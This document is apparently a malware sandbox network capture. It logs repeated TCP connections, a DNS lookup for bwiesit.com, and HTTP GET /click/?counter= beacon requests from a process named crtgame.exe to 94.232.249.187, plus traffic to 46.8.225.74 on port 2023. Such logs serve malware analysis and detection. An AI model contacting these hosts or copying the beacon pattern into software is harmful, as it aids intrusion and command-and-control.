                                                                            Dec 14, 2024 03:08:24.048780918 CET804980494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:24.048804045 CET4979880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:24.048865080 CET4980480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:24.049947023 CET4980480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:24.169564009 CET804980494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:25.392980099 CET804980494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:25.393608093 CET4980480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:25.506920099 CET4980480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:25.507289886 CET4980980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:25.627017975 CET804980494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:25.627084017 CET4980480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:25.627291918 CET804980994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:25.627372980 CET4980980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:25.627547979 CET4980980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:25.747235060 CET804980994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:26.999140024 CET804980994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:26.999222994 CET4980980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:27.116386890 CET4980980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:27.116764069 CET4981480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:27.236663103 CET804981494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:27.236716032 CET804980994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:27.236808062 CET4980980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:27.236814022 CET4981480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:27.236995935 CET4981480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:27.356888056 CET804981494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:28.580423117 CET804981494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:28.580570936 CET4981480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:28.694188118 CET4981480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:28.694498062 CET4981980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:28.814273119 CET804981994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:28.814306021 CET804981494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:28.814379930 CET4981980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:28.814488888 CET4981480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:28.814522982 CET4981980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:28.936094046 CET804981994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:30.164670944 CET804981994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:30.164823055 CET4981980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:30.272315025 CET4981980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:30.392323971 CET804981994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:30.770270109 CET804981994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:30.770391941 CET4981980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:30.881963015 CET4981980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:30.882265091 CET4982580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:31.003508091 CET804982594.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:31.003528118 CET804981994.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:31.003829002 CET4982580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:31.003830910 CET4981980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:31.003937006 CET4982580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:31.126017094 CET804982594.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:32.348701000 CET804982594.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:32.348768950 CET4982580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:32.459911108 CET4982580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:32.460180998 CET4982880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:32.580084085 CET804982894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:32.580183029 CET4982880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:32.580279112 CET804982594.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:32.580351114 CET4982580192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:32.580528021 CET4982880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:32.700261116 CET804982894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:33.923422098 CET804982894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:33.923562050 CET4982880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:34.038134098 CET4982880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:34.038541079 CET4983480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:34.161154032 CET804982894.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:34.161178112 CET804983494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:34.161221027 CET4982880192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:34.161290884 CET4983480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:34.161681890 CET4983480192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:08:34.281404018 CET804983494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:35.504785061 CET804983494.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:08:35.504852057 CET4983480192.168.2.494.232.249.187
Dec 14, 2024 03:08:35.616245031 CET | 49834 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:35.616660118 CET | 49839 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:35.737385035 CET | 80 | 49834 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:35.737457991 CET | 80 | 49839 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:35.737560987 CET | 49834 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:35.737622023 CET | 49839 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:35.739190102 CET | 49839 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:35.858900070 CET | 80 | 49839 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:37.096827984 CET | 80 | 49839 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:37.096939087 CET | 49839 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:37.216430902 CET | 49839 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:37.217051029 CET | 49844 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:37.336581945 CET | 80 | 49839 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:37.336685896 CET | 49839 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:37.336764097 CET | 80 | 49844 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:37.336848974 CET | 49844 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:37.337073088 CET | 49844 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:37.456769943 CET | 80 | 49844 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:38.687474966 CET | 80 | 49844 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:38.687702894 CET | 49844 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:38.803610086 CET | 49844 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:38.803939104 CET | 49847 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:38.924010038 CET | 80 | 49844 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:38.924065113 CET | 80 | 49847 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:38.924151897 CET | 49844 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:38.924196005 CET | 49847 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:38.924432039 CET | 49847 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:39.044091940 CET | 80 | 49847 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:40.308319092 CET | 80 | 49847 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:40.308517933 CET | 49847 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:40.448219061 CET | 49847 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:40.448473930 CET | 49852 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:40.568506002 CET | 80 | 49852 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:40.568557978 CET | 80 | 49847 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:40.568591118 CET | 49852 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:40.568620920 CET | 49847 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:40.569071054 CET | 49852 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:40.691265106 CET | 80 | 49852 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:41.915117025 CET | 80 | 49852 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:41.915277004 CET | 49852 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:42.022316933 CET | 49852 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:42.022649050 CET | 49858 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:42.142620087 CET | 80 | 49858 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:42.142680883 CET | 80 | 49852 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:42.142996073 CET | 49852 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:42.143002033 CET | 49858 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:42.143084049 CET | 49858 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:42.263025045 CET | 80 | 49858 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:43.485140085 CET | 80 | 49858 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:43.485287905 CET | 49858 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:43.600517988 CET | 49858 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:43.601062059 CET | 49861 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:43.720552921 CET | 80 | 49858 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:43.720637083 CET | 49858 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:43.720804930 CET | 80 | 49861 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:43.720900059 CET | 49861 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:43.725328922 CET | 49861 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:43.845063925 CET | 80 | 49861 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:45.064199924 CET | 80 | 49861 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:45.064366102 CET | 49861 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:45.178479910 CET | 49861 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:45.178792000 CET | 49865 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:45.298710108 CET | 80 | 49865 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:45.298877954 CET | 49865 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:45.299026012 CET | 80 | 49861 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:45.299034119 CET | 49865 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:45.299209118 CET | 49861 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:45.419025898 CET | 80 | 49865 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:46.669008970 CET | 80 | 49865 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:46.673588991 CET | 49865 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:46.787934065 CET | 49865 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:46.788244009 CET | 49870 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:46.909671068 CET | 80 | 49870 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:46.909884930 CET | 80 | 49865 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:46.909908056 CET | 49870 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:46.909981966 CET | 49865 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:46.910093069 CET | 49870 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:47.029738903 CET | 80 | 49870 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:48.257534981 CET | 80 | 49870 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:48.257697105 CET | 49870 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:48.366138935 CET | 49870 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:48.487001896 CET | 80 | 49870 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:48.858058929 CET | 80 | 49870 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:48.858160019 CET | 49870 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:48.975352049 CET | 49870 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:48.975667000 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:49.095489025 CET | 80 | 49870 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:49.095514059 CET | 80 | 49876 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:49.095645905 CET | 49870 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:49.095870018 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:49.095870972 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:49.215715885 CET | 80 | 49876 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:50.475550890 CET | 80 | 49876 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:50.475692034 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:50.589442015 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:50.711635113 CET | 80 | 49876 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:51.087025881 CET | 80 | 49876 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:51.087120056 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:51.194185019 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:51.314038992 CET | 80 | 49876 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:51.699235916 CET | 80 | 49876 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:51.699333906 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:51.803721905 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:51.803952932 CET | 49883 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:51.923685074 CET | 80 | 49883 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:51.923764944 CET | 49883 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:51.923923969 CET | 80 | 49876 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:51.923937082 CET | 49883 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:51.923978090 CET | 49876 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:52.043621063 CET | 80 | 49883 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:53.286915064 CET | 80 | 49883 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:53.287004948 CET | 49883 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:53.397345066 CET | 49883 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:53.397645950 CET | 49887 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:53.517452002 CET | 80 | 49887 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:53.517561913 CET | 49887 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:53.517733097 CET | 49887 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:53.517819881 CET | 80 | 49883 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:53.517889977 CET | 49883 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:53.638905048 CET | 80 | 49887 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:54.907599926 CET | 80 | 49887 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:54.907768965 CET | 49887 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:55.022845984 CET | 49887 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:55.023155928 CET | 49893 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:55.143414974 CET | 80 | 49893 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:55.143461943 CET | 80 | 49887 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:55.143624067 CET | 49893 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:55.143704891 CET | 49887 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:55.143764973 CET | 49893 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:55.263662100 CET | 80 | 49893 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:56.492563009 CET | 80 | 49893 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:56.492650986 CET | 49893 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:56.600327015 CET | 49893 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:56.600570917 CET | 49895 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:56.720429897 CET | 80 | 49895 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:56.720617056 CET | 49895 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:56.720701933 CET | 80 | 49893 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:56.720815897 CET | 49895 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:56.720841885 CET | 49893 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:56.840506077 CET | 80 | 49895 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:58.068844080 CET | 80 | 49895 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:58.069073915 CET | 49895 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:58.178580999 CET | 49895 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:58.178872108 CET | 49899 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:58.298743010 CET | 80 | 49899 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:58.298835039 CET | 49899 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:58.298844099 CET | 80 | 49895 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:58.298908949 CET | 49895 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:58.299087048 CET | 49899 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:58.420265913 CET | 80 | 49899 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:59.653589964 CET | 80 | 49899 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:59.653727055 CET | 49899 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:59.772619009 CET | 49899 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:59.772877932 CET | 49905 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:59.895176888 CET | 80 | 49899 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:59.895308971 CET | 80 | 49905 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:08:59.895381927 CET | 49899 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:59.895418882 CET | 49905 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:08:59.895632982 CET | 49905 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:00.015335083 CET | 80 | 49905 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:01.284673929 CET | 80 | 49905 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:01.288044930 CET | 49905 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:01.399995089 CET | 49905 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:01.400266886 CET | 49909 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:01.520018101 CET | 80 | 49909 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:01.520034075 CET | 80 | 49905 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:01.520113945 CET | 49909 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:01.520137072 CET | 49905 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:01.520328045 CET | 49909 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:01.640064001 CET | 80 | 49909 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:02.868812084 CET | 80 | 49909 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:02.868922949 CET | 49909 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:02.985239983 CET | 49909 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:02.985440969 CET | 49913 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:03.106102943 CET | 80 | 49909 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:03.106157064 CET | 80 | 49913 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:03.106214046 CET | 49913 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:03.106214046 CET | 49909 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:03.106534958 CET | 49913 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:03.226372004 CET | 80 | 49913 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:04.512526035 CET | 80 | 49913 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:04.512572050 CET | 80 | 49913 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:04.512597084 CET | 49913 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:04.512630939 CET | 49913 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:04.513292074 CET | 49915 | 2023 | 192.168.2.4 | 46.8.225.74
Dec 14, 2024 03:09:04.633497000 CET | 2023 | 49915 | 46.8.225.74 | 192.168.2.4
Dec 14, 2024 03:09:04.633615971 CET | 49915 | 2023 | 192.168.2.4 | 46.8.225.74
Dec 14, 2024 03:09:04.633713961 CET | 49915 | 2023 | 192.168.2.4 | 46.8.225.74
Dec 14, 2024 03:09:04.753499031 CET | 2023 | 49915 | 46.8.225.74 | 192.168.2.4
Dec 14, 2024 03:09:04.753632069 CET | 49915 | 2023 | 192.168.2.4 | 46.8.225.74
Dec 14, 2024 03:09:04.995285988 CET | 2023 | 49915 | 46.8.225.74 | 192.168.2.4
Dec 14, 2024 03:09:05.903081894 CET | 2023 | 49915 | 46.8.225.74 | 192.168.2.4
Dec 14, 2024 03:09:05.975047112 CET | 49915 | 2023 | 192.168.2.4 | 46.8.225.74
Dec 14, 2024 03:09:07.914593935 CET | 49913 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:07.915026903 CET | 49923 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:08.034971952 CET | 80 | 49913 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:08.035093069 CET | 49913 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:08.035115957 CET | 80 | 49923 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:08.035178900 CET | 49923 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:08.035353899 CET | 49923 | 80 | 192.168.2.4 | 94.232.249.187
Dec 14, 2024 03:09:08.155071020 CET | 80 | 49923 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:09.444845915 CET | 80 | 49923 | 94.232.249.187 | 192.168.2.4
Dec 14, 2024 03:09:09.445533991 CET | 49923 | 80 | 192.168.2.4 | 94.232.249.187
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 03:07:56.161679983 CET | 60791 | 53 | 192.168.2.4 | 45.155.250.90
Dec 14, 2024 03:07:56.411474943 CET | 53 | 60791 | 45.155.250.90 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 03:07:56.161679983 CET | 192.168.2.4 | 45.155.250.90 | 0xe3af | Standard query (0) | bwiesit.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 03:07:56.411474943 CET | 45.155.250.90 | 192.168.2.4 | 0xe3af | No error (0) | bwiesit.com | | 94.232.249.187 | A (IP address) | IN (0x0001) | false

• bwiesit.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:07:56.630903959 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:07:57.978707075 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:07:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:07:58.085033894 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:07:58.607819080 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:07:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
